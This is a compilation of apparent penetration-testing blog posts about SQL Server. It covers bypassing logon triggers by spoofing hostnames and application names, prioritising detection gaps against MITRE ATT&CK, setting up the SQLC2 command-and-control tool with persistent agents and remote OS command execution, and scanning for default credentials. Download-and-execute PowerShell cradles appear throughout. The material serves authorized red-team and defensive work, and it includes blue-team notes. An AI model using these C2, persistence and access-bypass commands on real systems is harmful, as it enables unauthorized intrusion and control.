              RAISERROR('You are not allowed to login from this application name.', 16, 1);
              ROLLBACK;
         END
    END
  4. After setting up the logon trigger you should get an error like the one below when you attempt to login with SSMS again, because you are connecting from an application that is not on the white list.


Spoofing Application Names using SSMS

Once again, you might ask, "when would I actually use this in the real world?". Some applications have their name statically set in the connection string used to connect to the SQL Server. Similar to hostnames, we find them in configuration files and source code. It's actually pretty rare to see a logon trigger restrict access by application name, but we have seen it a few times. Alright, let's spoof our appname in SSMS.
  1. Open the "Connect Object Explorer" in SSMS and navigate to options -> "Additional Connection Parameters". From there you can set connection string properties on the fly (super cool). For the sake of this example we'll set the "application name" property to "SuperApp3000", which is a application name we know is white listed. Note: I'll cover a few ways to identify white listed application names later.


  2. Press connect to login. If you open a query window and check your application name again it should return "SuperApp3000". This helps further illustrate that we successfully spoofed the application name.
    SELECT APP_NAME()

Spoofing Application Names using Connection Strings

As I mentioned in the last section, there is a connection string property named "AppName" (also accepted as "Application Name" or "ApplicationName") that can be used by applications to declare their application name to the SQL Server. Below are a few examples of accepted formats.
Data Source=server\instance1;Initial Catalog=Master;Integrated Security=True;Application Name=MyApp;
Data Source=server\instance1;Initial Catalog=Master;Integrated Security=True;ApplicationName=MyApp;
Data Source=server\instance1;Initial Catalog=Master;Integrated Security=True;AppName=MyApp;

Spoofing Application Names using PowerUpSQL

To help illustrate the application name spoofing scenario, I've updated the Get-SQLQuery function of PowerUpSQL to include the "appname" option. I will be working toward retrofitting the other functions once I find some more time. Below is a basic example for now.
  1. Open Powershell and load PowerUpSQL via your preferred method. The example below shows how to load it from GitHub directly.
    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
  2. PowerUpSQL functions wrap .NET SQL Server functions. When connecting to SQL Server programmatically with .NET, the "appname" property is set to ".Net SqlClient Data Provider" by default. However, since we created a new logon trigger that restricts access by "appname" we should get the following error.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Query "SELECT app_name()" -ReturnError
  3. Now set the "appname" property to "SuperApp3000" and you should be able to execute the query successfully.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Query "SELECT app_name()" -AppName SuperApp3000
  4. To remove the trigger you can issue the command below.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -AppName SuperApp3000 -Query 'DROP TRIGGER MyAppsOnly on all server'
  5. Now you can connect without having to spoof the application name.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Query 'SELECT APP_NAME()'
  6. Or you can just spoof any application name for the fun of it.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -AppName EvilClient -Query 'SELECT APP_NAME()'

Finding White Listed Hostnames and Application Names

If you're not sure what hostnames and applications are in the logon trigger's white list, below are a few options for blindly discovering them.
  1. Review the Logon Trigger Source Code: The best way to get a complete list of the hostnames and applications white listed by a logon trigger is to review the source code. However, in most cases this requires privileged access.
    SELECT    name,
    OBJECT_DEFINITION(OBJECT_ID) as trigger_definition,
    parent_class_desc,
    create_date,
    modify_date,
    is_ms_shipped,
    is_disabled
    FROM sys.server_triggers  
    ORDER BY name ASC
  2. Review Application Code for Hardcoded Values: Sometimes the allowed hostnames and applications are hardcoded into the application. If you are dealing with a .NET or Java application, you can decompile and review the source code for keywords related to the connection string they are using. This approach assumes that you have access to application assemblies or configuration files. JD-GUI and DNSPY can come in handy.
  3. Review Application Traffic: Sometimes the allowed hostnames and applications are grabbed from the database server when the application starts. As a result, you can use your favorite sniffer to grab the list. I've experienced this a few times. You may ask, why would anyone do this? The world may never know.
  4. Use a List of Domain Systems: If you already have a domain account, you can query Active Directory for a list of domain computers. You can then iterate through the list until you come across one that allows connections (see the sketch after this list). This assumes that the current domain user has the privileges to login to SQL Server and the white listed hostnames are associated with the domain.
  5. Use MITM to Inventory Connections: You can also perform a standard ARP based man-in-the-middle (MITM) attack to intercept connections to the SQL Server from remote systems. If the connection is encrypted (default since SQL Server 2014) you won't see the traffic, but you'll still be able to see which hosts are connecting. Naturally other MITM techniques could be used as well. Warning: If certificate validation is being done this could result in dropped packets and have an impact on a production system, so please use this approach with caution.
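To illustrate option 4, below is a rough sketch that tries each domain computer name as the spoofed hostname. It assumes PowerUpSQL is loaded, the current user can read Active Directory, and the instance name is a placeholder:
# Pull computer names from Active Directory
$Computers = ([adsisearcher]'(objectCategory=computer)').FindAll() |
    ForEach-Object { $_.Properties['name'][0] }

# Try each computer name as a spoofed hostname until one is allowed
foreach ($Name in $Computers) {
    $Result = Get-SQLQuery -Instance "MSSQLSRV04\SQLSERVER2014" -Query "SELECT HOST_NAME()" -WorkstationId $Name
    if ($Result) { Write-Output "White listed hostname found: $Name"; break }
}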

General Recommendations

  • Don't use logon triggers to restrict access to SQL Server based on information that can be easily changed by the client.
  • If you wish to restrict access to an allowed list of systems, consider using network or host level firewall rules instead of logon triggers.
  • Consider limiting access to the SQL Server based on user groups and assigned permissions instead of using logon triggers.

Wrap Up

In this blog I covered a few ways to leverage lesser known connection string properties to bypass access restrictions being enforced by SQL Server logon triggers. Hopefully this will be useful if you have to perform a penetration test of a legacy desktop application down the line. If nothing else, hopefully the blog highlighted a few things to avoid when building two-tiered desktop applications. For those who are interested, I've also updated the "SQL Server Connection String Cheatsheet" here.

As Adversarial Simulation continues to gain momentum, more companies are performing full evaluations of their technical detective control capabilities using tools like the Mitre ATT&CK Framework. While this is a great way for internal security teams to start developing a detective control baseline, even mature organizations find themselves with dozens of detective capability gaps to follow up on. So, the natural question we hear from clients is "What is the best way to prioritize and streamline our remediation efforts?". In this blog I'll provide a few tips based on my experiences. Before I go down that road, I wanted to take a moment to touch on how I'm qualifying adversarial simulation in this context. Feel free to SKIP AHEAD to the actual tips.

Adversarial Simulation

To better answer the questions "What are attackers doing?" and "What should we be looking for?", internal security teams started to document the techniques being used by malware, red teams, and penetration testers at each phase of the Cyber Kill Chain. This inventory of techniques could then be used to baseline detection capabilities. As time went on, projects like the Mitre ATT&CK Framework started to gain more favor with both the red and the blue teams. Out of this shared adoption of an established and public framework, Adversarial Simulation began to grow in popularity. Similar to the term "red team", "Adversarial Simulation" can mean different things to different people. In this context, I'm defining it as "measuring the effectiveness of existing technical detective controls using a predefined collection of security unit tests". The goal of this type of testing is to measure the company's ability to identify known Tools, Techniques, and Procedures (TTPs) related to the behavior of attackers that have already obtained access to the environment, in an effort to build and maintain a detective control baseline. After conducting multiple Adversarial Simulation exercises with small, medium, and large organizations, one thing became very apparent: if your company hasn't performed adversarial simulation testing before, then you're likely to have quite a few gaps at each phase of the cyber kill chain. At first this can seem overwhelming, but it is something that you can triage, prioritize, and manage. The rest of this blog covers some triage options for those companies going through that now.

Using MITRE ATT&CK as a Measuring Stick

The MITRE ATT&CK framework defines categories and techniques that focus on post-exploitation behavior. Since the goal is to detect that type of behavior, it offers a nice starting point.

Source: https://attack.mitre.org/

While this is a good place to start measuring your detective and preventative controls, it’s just a starting point.  ATT&CK doesn’t cover a lot of technologies commonly found in enterprise environments, and not all the techniques covered will be applicable to your environment. Many of the internal security teams we work with have started adopting the ATT&CK framework to some degree. The most common process we see them using has been outlined below:
  • Start with the entire framework
  • Remove techniques that are not applicable to your environment
  • Add techniques that are specific to technologies in your environment
  • Add techniques that are not covered, but are well known
  • Work through one category at a time
  • Test one technique at a time
  • Assess the SOC team’s ability to detect the technique
  • Identify artifacts, identify data sources used for TTP discovery, and create SIEM rules
  • Document technique coverage
  • Rinse, lather, and repeat.
While there are some commercial products and services available to support this process, we have also seen some great open source projects. The Threat Hunter Playbook created by Roberto Rodriguez is at the top of my recommended reading list. It includes lots of useful tools to help internal teams get rolling. You can find it on GitHub: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook

When we work with clients, we typically measure the applicable techniques in all phases to provide insight into their ability to detect them within each of the post-exploitation attack phases defined in the ATT&CK framework. However, sometimes that can be information overload, so starting with a few key categories of techniques can be a nice way to kick things off. Clients usually prefer to prioritize around execution, defense evasion, and exfiltration, because they essentially represent the beginning and end of a basic attack workflow. Also, when evaluating exfiltration techniques, you implicitly cover some of the more common control channels. Below is a sample of the summary data that can shake loose when looking at the whole picture. At first glance this can seem alarming, but the sky is not falling. Keep in mind that the technologies and processes to identify post-exploitation TTPs are still trying to catch up to attackers. The first step to getting better is being honest about what you can and can't do. That way you'll have the information you need to create a prioritized roadmap that can give you more coverage in a shorter period of time for less money (hopefully).

Remediation Prioritization Tips

The goal of these tips is to reduce the time/dollar investment required to improve the effectiveness of the current controls and your overall ability to detect known and potential TTPs. To start us off I wanted to note that you can’t alert on the information you don’t have.  As a result, missing data sources often map directly to missing alerts in specific categories.

Prioritizing Data Sources

As I mentioned before, data sources are what fuel your detective capabilities. When choosing to build out a new data source or detective capability, consider prioritizing around those that have the potential to cover the highest number of techniques across all ATT&CK framework categories. For example, netflow data can be used to identify:
  • Generic scanning activity
  • Authenticated scanning
  • ICMP and DNS tunnels
  • Large file downloads and uploads
  • Long login sessions
  • Reverse shell patterns
  • Failed egress attempts
I'm sure there are more use cases, but you get the idea. Naturally, you should inventory and track your known data sources and be conscious of what your data source gaps are. One way to help make sure that gap list is fleshed out is to identify potential data sources based on which techniques don't generate any alerts. Below is a basic pie chart showing how that type of data can be represented. It summarizes the level of visibility for techniques that did not generate a security alert. The identified detection gaps fall into 1 of 5 detection levels: Unknown, Undetected, Partially Logged, Logged, and Partially Detected.

Existing Data Sources

From this we can see that 60% of the techniques that didn't generate an alert still left traces in logs. By pulling in that log data we can almost immediately start working on correlations and alerts for many of the associated attack techniques. That by itself should have some influence on what you start with when building out new detections.

Missing Data Sources

The other 40% represent missing or misconfigured data sources. Using the list of associated techniques and information from Mitre we can determine potential data sources, and which ones would provide coverage for the largest number of techniques. If you're not sure what data sources are associated with which techniques, you can find that information on the Mitre website. Below is an example that illustrates some of the information available for the Accessibility Features technique in Windows.

Source: https://attack.mitre.org/wiki/Technique/T1015

To streamline your lookups, consider using Invoke-ATTACKAPI by Roberto Rodriguez. It can be downloaded from https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI. Below is a sample PowerShell script that uses Invoke-ATTACKAPI to get a list of the data sources that can be used to identify multiple attack techniques. To increase its usefulness, you could easily modify it to only include the attack techniques that you know you're blind to (see the sketch after the command results below). Note: All of your data sources may not be covered by the framework, or the framework may use different language to describe them.
# Load the Invoke-ATTACKAPI script from GitHub and sync the framework data
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1")

# Group techniques by data source
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" | Select "Data Source",TechniqueName -Unique |
ForEach-Object {

    # Create one record per technique/data source pair
    $TechniqueName = $_.TechniqueName
    $_."Data Source" | ForEach-Object {

        $Object = New-Object PSObject
        $Object | Add-Member NoteProperty TechniqueName $TechniqueName
        $Object | Add-Member NoteProperty DataSource $_
        $Object
    }

} | Select TechniqueName,DataSource | Group-Object DataSource | Sort-Object Count -Descending
From the command results, you can quickly see that "Process Monitoring" and a few others can be incredibly powerful data sources for detecting the techniques in the MITRE ATT&CK Framework.
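As mentioned above, you could also scope that output to just your known blind spots. Below is a small, hypothetical sketch of that modification; it reuses the $AllTechniques variable from the script above, and the technique names in $BlindSpots are placeholders for whatever your own gap assessment turned up.
# Hypothetical example: limit the data source grouping to techniques you can't detect today.
# The technique names below are placeholders, not findings.
$BlindSpots = @('Accessibility Features','Scheduled Task','Regsvr32')
$AllTechniques | Where-Object platform -like "Windows" |
Where-Object { $BlindSpots -contains $_.TechniqueName } |
Select "Data Source",TechniqueName -Unique |
ForEach-Object {
    $TechniqueName = $_.TechniqueName
    $_."Data Source" | ForEach-Object {
        [pscustomobject]@{ TechniqueName = $TechniqueName; DataSource = $_ }
    }
} | Group-Object DataSource | Sort-Object Count -Descending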

Prioritizing Techniques by Tactic

Command execution and defense evasion techniques occur at the beginning of, and throughout, the kill chain. As such, having deeper visibility into these techniques can help mitigate risk associated with some of the visibility gaps in later attack phases, such as persistence, lateral movement, and credential gathering, by detecting potentially malicious behavior sooner. Below I reorganized the ATT&CK categories from our previous example test results to illustrate the point.


Command Execution

Attackers often employ non-standard command execution techniques that leverage native applications to avoid application whitelisting controls. Many of those techniques are not commonly used by legitimate users, so the commands themselves can be used as reliable indicators of malicious behavior. For example, most users don't use regsvr32.exe, regsvcs.exe, or msbuild.exe at all. When they are used legitimately, it's rare that they use the same command options as attackers. For some practical examples, check out the atomic-red-team repo on GitHub: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/windows-index.md

Defense Evasion

Similar to command execution, attackers often employ defense evasion techniques that do not represent common user behavior. As a result, they can be used as reliable indicators of malicious behavior.

Lateral Movement

Not every attacker performs scanning, but a lot of them do. If you can accurately identify generic scanning and authenticated scanning behavior through netflow data and Windows authentication logs, you have a pretty good chance of detecting them. If you have the data sources, but alerts aren't configured, it's worth the effort to close the gap. Sean Metcalf shared a presentation that covers some information on the topic (among other things) that can be found here. Ideally it will help you identify potentially malicious movement before the attackers reach their target and start exfiltration.

Exfiltration

If you missed the attacker executing commands on the endpoints, looking for common malicious behaviors and anomalies in outbound traffic and internet-facing systems can yield some valuable results (assuming you have the right data sources). Most people are familiar with the common control channels, but for those who are not, below is a short list:
  • ICMP, SMTP, SSH, and DNS tunnels
  • TCP/UDP reverse shells (over various ports/protocols)
  • TCP/UDP beacons (over various ports/protocols)
  • Web shells

Prioritizing Techniques by Utility

Developing detections for techniques that are used in multiple attack phases can give you a better return on your time/dollar investments. For example, scheduled tasks can be used for execution, persistence, privilege escalation, and lateral movement. So, when you have the ability to identify high risk tasks that are being created, you can kill several birds with one stone. (Note: No birds were actually killed in the making of this blog.) Below is a sample PowerShell script that uses Invoke-ATTACKAPI to get a list of the techniques used in multiple attack categories. To increase its usefulness, you could easily modify it to only include the attack techniques that you're blind to.
# Load the Invoke-ATTACKAPI script from GitHub and sync the framework data
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1")

# Grab and group the techniques by tactic
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" | Select Tactic,TechniqueName -Unique |
ForEach-Object {

    # Create one record per technique/tactic pair
    $Technique = $_.TechniqueName
    $_.tactic | ForEach-Object {

        $Object = New-Object PSObject
        $Object | Add-Member NoteProperty TechniqueName $Technique
        $Object | Add-Member NoteProperty Tactic $_
        $Object
    }
} | Select TechniqueName,Tactic | Group-Object TechniqueName | Sort-Object Count -Descending | Select Count,Name -Skip 1
Once again you can see that some of the techniques can be used in more phases than others.

Prioritizing Techniques by (APT) Group

The ATT&CK framework also includes information related to well-known APT groups and campaigns at https://attack.mitre.org/wiki/Groups. The groups are linked to techniques that were used during campaigns. As a result, we can see which techniques are used by the largest number of (APT) groups using the Invoke-ATTACKAPI PowerShell script below.
# Load the Invoke-ATTACKAPI script from GitHub and sync the framework data
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1")

# Techniques used by the largest number of APT groups
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" | Select Group,TechniqueName -Unique |
Where-Object Group -notlike "" | Group-Object TechniqueName | Sort-Object Count -Descending
To make it more useful, filter for group names that are more relevant to your industry. At the moment I don't think the industries or countries targeted by the groups are available as metadata in the ATT&CK framework, so for now that part may be a manual process. Either way, big thanks to Jimi for the tip!
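As a rough sketch, that manual filtering could look something like the following; the group names in $MyGroups are placeholders for whatever list you curate for your industry, and it reuses the $AllTechniques variable from the script above.
# Hypothetical example: scope the technique summary to a manually curated group list.
# Note: if the Group property is a collection, flatten it first.
$MyGroups = @('APT28','APT29')
$AllTechniques | Where-Object platform -like "Windows" |
Select Group,TechniqueName -Unique |
Where-Object { $MyGroups -contains $_.Group } |
Group-Object TechniqueName | Sort-Object Count -Descending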

Prioritizing Based on Internal Policies and Requirements

Understanding your company's priorities and policies should always influence your choices. However, if you are going to follow those policies, make sure that the language is well defined and understood. For example, if you have an internal policy that states you must be able to detect all known threats, then "known threats" needs to be defined, and expectations should be set as to how the list of known threats will be maintained. Like vulnerability severity ranking, you should also create a system for ranking detective control gaps. That system should also define how quickly the company will be required to develop a detective capability, whether through existing controls, new controls, or process improvements.

Bridging the Gap with Regular Hunting Exercises

Regardless of how you prioritize the development of your detective capabilities, things take time. Collecting new data sources, improving logging, and improving SIEM data ingestion/rules for all of your gaps is rarely a quick process. While you're building out that automation, consider keeping an eye on known gaps via regular hunting exercises. We've seen a number of clients leverage well-defined hunts to yield pretty solid results. There was a nice presentation by Jared Atkinson and a recent paper by Paul Ewing/Devon Kerr from Endgame that are worth checking out if you need a jump start.

Wrap Up

Just like preventative controls, there is no such thing as 100% threat detection. Tools, techniques, and procedures are constantly changing and evolving. Do the best you can with what you have. You'll have to make choices based on perceived risks and the ROI of your security control investments in the context of your company, but hopefully this blog will help make some of the choices easier. At the end of the day, all of my recommendations and observations are limited to my experiences and the companies I've worked with in the past. So please understand that while I've worked with quite a few security teams, I still suffer from biases like everyone else. If you have other thoughts or recommendations, I would love to hear them. Feel free to reach out in the comments. Thanks and good luck!

Databases and Clouds: SQL Server as a C2

There is no shortage of dependable control channels or RATs these days, but I thought it would be a fun side project to develop one that uses SQL Server. In this blog, I'll provide an overview of how to create and maintain access to an environment using SQL Server as the controller and the agent using a new PoC script called SQLC2. It should be interesting to the adversarial simulation, penetration testing, red, purple, blue, and orange? teams out there looking for something random to play with. Did I miss any marketing terms?

Why SQL Server?

Well, the honest answer is I just spend a lot of time with SQL Server and it sounded fun. However, there are practical reasons too. More companies are starting to use Azure SQL Server databases. When those Azure SQL Server instances are created, they are made accessible via a subdomain of "*.database.windows.net" on port 1433. For example, I could create an SQL Server instance named "mysupersqlserver.database.windows.net". As a result, some corporate network configurations allow outbound internet access to any "*.database.windows.net" domain on port 1433. So, the general idea is that as Azure SQL Server adoption grows, there will be more opportunity to use SQL Server as a control channel that looks kind of like normal traffic.
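If you're curious whether your own egress rules allow that kind of traffic, a quick check with the built-in Test-NetConnection cmdlet will tell you; the server name below is just the made-up example from this section.
# Check outbound access to an Azure SQL Server endpoint on port 1433
Test-NetConnection -ComputerName mysupersqlserver.database.windows.net -Port 1433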

SQLC2 Overview

SQLC2 is a PowerShell script for deploying and managing a command and control system that uses SQL Server as both the control server and the agent. Basic functionality includes:
  • Configuring any SQL Server to be a controller
  • Installing/Uninstalling PowerShell and SQL Server based SQLC2 agents on Windows systems
  • Submitting OS commands remotely
  • Recovering OS command results remotely
SQLC2 can be downloaded from https://github.com/NetSPI/SQLC2/. At its core, SQLC2 is just a few tables in a SQL Server instance that track agents, commands, and results. Nothing too fancy, but it may prove to be useful on some engagements. Although this blog focuses on using an Azure SQL Server instance, you could host your own SQL Server in any cloud environment and have it listen on port 443 with SSL enabled. So, it could offer a little more flexibility depending on how much effort you want to put into it.

Naturally, SQLC2 was built for penetration test and red team engagements, but be aware that for this release I didn't make a whole lot of effort to avoid blue team detection. If that's your goal, I recommend using the "Install-SQLC2AgentLink" agent installer instead of "Install-SQLC2AgentPs". The link agent operates almost entirely at the SQL Server layer and doesn't use any PowerShell, so it's able to stay under the radar more than the other supported persistence methods. Below is a diagram illustrating the SQLC2 architecture.


For those who are interested, below I’ve provided an overview of the Azure setup, and a walkthrough of the basic SQLC2 workflow. Enjoy!

Setting Up an SQL Server in Azure

I was going to provide an overview of how to set up an Azure database, but Microsoft has already written a nice article on the subject. You can find it at https://docs.microsoft.com/en-us/azure/sql-database/sql-database-get-started-portal.

SQLC2: Installing C2 Server Tables

The SQLC2 controller can be installed on any SQL Server by creating two tables within the provided database. That database will then be used in future commands to check in agents, download commands, and upload command results. Below is the command to set up the SQLC2 tables in a target SQL instance.
Install-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
You can use the SQLC2 command below to check which agents have phoned home. However, there won't be any agents registered directly after the server installation.
Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Once agents and commands have been processed, the C2 tables will simply store the data. You can also connect directly to your Azure SQL Server with SQL Server Management Studio to view the results. Below is an example screenshot.


SQLC2: Installing C2 Agents

SQLC2 supports three methods for installing and running agents for downloading and executing commands from the C2 server.
  1. Direct Execution: Executing directly via the Get-SQLC2Command
  2. Windows Scheduled Task: Installing an SQLC2 PowerShell agent that runs via a scheduled task every minute.
  3. SQL Server Agent Job: Installing an SQLC2 SQL Server agent job that communicates to the C2 server via a server link.

Option 1:  Direct Execution

You can list pending commands for the agent with the command below. Any Get-SQLC2Command execution will automatically register the agent with the C2 server.
Get-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Adding the -Execute flag will run pending commands.
Get-SQLC2Command -Verbose -Execute -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
The examples above show how to run SQLC2 commands manually. However, you could have any persistence method load SQLC2 and run these commands to maintain access to the environment.
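For illustration, here's a minimal sketch of what that could look like as a simple polling loop; the instance, database, credentials, and 60-second interval are the example values used throughout this post.
# A minimal polling loop: run pending commands, then sleep.
# Any persistence mechanism could be used to start this loop.
while ($true) {
    Get-SQLC2Command -Execute -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
    Start-Sleep -Seconds 60
}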

Option 2:  Windows Scheduled Task

Installing an SQLC2 PowerShell agent to run via a scheduled task that runs every minute. Note: Using the -Type parameter options you can also install persistence via "run" or "image file execution options" registry keys.
Install-SQLC2AgentPs -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
It can be uninstalled with the command below:
Uninstall-SQLC2AgentPs -Verbose

Option 3:  SQL Server Agent Job

Installing an SQLC2 SQL Server agent job that communicates to the C2 server via a server link.
Install-SQLC2AgentLink -Verbose -Instance 'MSSQLSRV04\SQLSERVER2014' -C2Instance sqlserverc21.database.windows.net -C2Database test1 -C2Username CloudAdmin -C2Password 'BestPasswordEver!'
For those who are interested, I've also provided a TSQL version of the SQL Server agent installer that you can find at https://github.com/NetSPI/SQLC2/blob/master/tsql/Install-SQLC2AgentLink.sql. It can be uninstalled with the command below.
Uninstall-SQLC2AgentLink -Verbose -Instance 'MSSQLSRV04\SQLSERVER2014'

SQLC2: Issuing OS Commands

To send a command to a specific agent, you can use the command below. Please note that in this release the agent names are either the computer name or the SQL Server instance name the agent was installed on. Below are a few command examples showing a registered agent and issuing a command to it.
Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Set-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!' -Command "Whoami" -ServerName MSSQLSRV04

SQLC2: Get Command Results

Below is the command for viewing the command results. It supports filters for server name, command status, and command ID.
Get-SQLC2Result -Verbose -ServerName "MSSQLSRV04" -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

SQLC2: Uninstalling C2 Tables

Below are some additional commands for cleaning up when you're done. They include commands to clear the command history table, clear the agent table, and remove the C2 tables altogether.
Clear command history:
Remove-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Clear agent list:
Remove-SQLC2Agent -Username c2admin -Password 'SqlServerPasswordYes!' -Instance sqlserverc21.database.windows.net -Database test1 -Verbose
Remove SQLC2 tables:
Uninstall-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Blue Team Notes

  • The PowerShell commands and agents should show up in your PowerShell logs which can be a useful data source.
  • The persistence methods for tasks, registry run keys, and "image file execution options" registry keys can all be audited, and alerts can be configured. The commands used to create the persistence also tend to generate Windows event logs that can be useful, and most Endpoint Detection and Response solutions can identify the commands at execution time.
  • If possible, deploy audit configurations to internal SQL Servers to help detect rogue agent jobs, ad-hoc queries, and server links. I have some old examples of logging options here. If configured correctly, they can feed alerts directly into the Windows event log.
  • Although it’s harder than it sounds, try to understand what’s normal for your environment. If you can restrict access to “*.database.windows.net” to only those who need it, then it can be an opportunity to both block outbound access and detect failed attempts.  Network and DNS logs can come in handy for that.

Wrap Up

SQLC2 is a pretty basic proof of concept, but I think it's functional enough to illustrate the idea. Eventually, I'll likely roll it into PowerUpSQL for the sake of keeping the offensive SQL Server code together. At that point, maybe I'll also roll in a few CLR functions to step it up a bit. In the meantime, for those of you looking to explore more offensive cloudscape options, check out Karl Fosaaen's blog on other Azure services that can be useful during red team engagements. It's pretty interesting.

Attacking Application Specific SQL Server Instances

This blog walks through how to quickly identify SQL Server instances used by 3rd party applications that are configured with default users/passwords using PowerUpSQL. I've presented on this topic a few times, but I thought it was worth a short blog to help address common questions. Hopefully it will be useful to penetration testers and internal security teams trying to clean up their environments.

Update September 13, 2018: This is just a quick addition to the original blog. I added 15 more default passwords to the Get-SQLServerLoginDefaultPw function. Details can be found here.

Testing Approach Summary

Default passwords are still one of the biggest issues we see during internal network penetration tests. Web applications are especially neglected, but 3rd party applications that are deployed with their own instance of SQL Server can also go overlooked. Rob Fuller created a nice list of default SQL Server instance passwords on PWNWiki a while back. We were tracking our own list as well, so I glued them together and wrapped a little PowerShell around them to automate the testing process. The high-level process is pretty straightforward (a rough sketch of the cross-reference logic follows the list):
  1. Create a list of application specific SQL Server instance names and the associated default users/passwords.
  2. Identify SQL Instances through LDAP queries, scanning activities, or other means.
  3. Cross reference the list of default instance names with the discovered instance names.
  4. Attempt to log into SQL Server instances that match using the associated default credentials. 😊 Tada!
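Before getting into the PowerUpSQL commands, here's a rough PowerShell sketch of steps 2 through 4 above. The $Defaults table and its credential values are placeholders for illustration; the real instance/credential list is baked into the Get-SQLServerLoginDefaultPw function covered below.
# Rough sketch of the cross-reference logic. The credential values are placeholders.
$Defaults = @(
    [pscustomobject]@{ InstanceName = 'CDRDICOM'; Username = 'sa'; Password = '<default>' }
    [pscustomobject]@{ InstanceName = 'ACT7';     Username = 'sa'; Password = '<default>' }
)
Get-SQLInstanceDomain | ForEach-Object {
    # Grab the instance name portion of "server\instance"
    $InstanceName = ($_.Instance -split '\\')[-1]
    $Match = $Defaults | Where-Object { $_.InstanceName -eq $InstanceName }
    if ($Match) {
        # Attempt a login only when a known application instance name matches
        Get-SQLConnectionTest -Instance $_.Instance -Username $Match.Username -Password $Match.Password
    }
}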

Loading PowerUpSQL

PowerUpSQL can be loaded quite a few different ways in PowerShell. Below is a basic example showing how to download and import the module from GitHub.
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
For more standard options visit https://github.com/NetSPI/PowerUpSQL/wiki/Setting-Up-PowerUpSQL. Also, for more download cradle options check out Matthew Green’s blog at https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html.

Command Example: Targeting with Broadcast Ping

After you’ve loaded PowerUpSQL, you can run the command below to discover SQL Server Instances on your current broadcast domain.
Get-SQLInstanceBroadcast -Verbose
As you can see, the command provides you with a list of SQL Server instances on your local network. To identify which of the SQL instances are configured with default passwords, you can pipe "Get-SQLInstanceBroadcast" to "Get-SQLServerLoginDefaultPw" as shown below.
Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw -Verbose

Command Example: Targeting with LDAP Query

If you have domain credentials, or are already running on a domain system, you can also query Active Directory via LDAP for a list of registered SQL Servers with the command below. This can also be executed from a non-domain system using syntax from the PowerUpSQL Discovery Cheatsheet.
Get-SQLInstanceDomain -Verbose
Like the last example, you can simply pipe “Get-SQLInstanceDomain”  into “Get-SQLServerLoginDefaultPw” to identify SQL Server instances registered on the domain that are configured with default passwords.
Get-SQLInstanceDomain -Verbose | Get-SQLServerLoginDefaultPw -Verbose
The full list of SQL Server instance discovery functions supported by PowerUpSQL have been listed below.
  • Get-SQLInstanceFile: Returns SQL Server instances from a file (one per line).
  • Get-SQLInstanceLocal: Returns SQL Server instances from the local system based on a registry search.
  • Get-SQLInstanceDomain: Returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL service principal names. The function will default to the current user's domain and logon server, but an alternative domain controller can be provided. UDP scanning of management servers is optional.
  • Get-SQLInstanceScanUDP: Returns SQL Server instances from UDP scan results.
  • Get-SQLInstanceScanUDPThreaded: Returns SQL Server instances from UDP scan results and supports threading.
  • Get-SQLInstanceBroadcast: Returns SQL Server instances on the local network by sending a UDP request to the broadcast address of the subnet and parsing responses.
I also wanted to note that there is a DBATools function called "Find-DbaInstance" that can be used for blind SQL Server instance discovery. It actually supports a few more discovery options than PowerUpSQL. Chrissy LeMaire already wrote a nice overview that can be found at https://dbatools.io/find-sql-instances/.

What does Get-SQLServerLoginDefaultPw look for?

Currently the "Get-SQLServerLoginDefaultPw" function covers 41 application-specific default SQL Server instances, users, and passwords. I intentionally didn't include instances named SQL Express or MSSQLSERVER, because I wanted to avoid account lockouts. The only time a login is attempted is when there is an instance match that is unique to the application deployment. For those who are curious, the current list of application-specific instance names has been provided below.
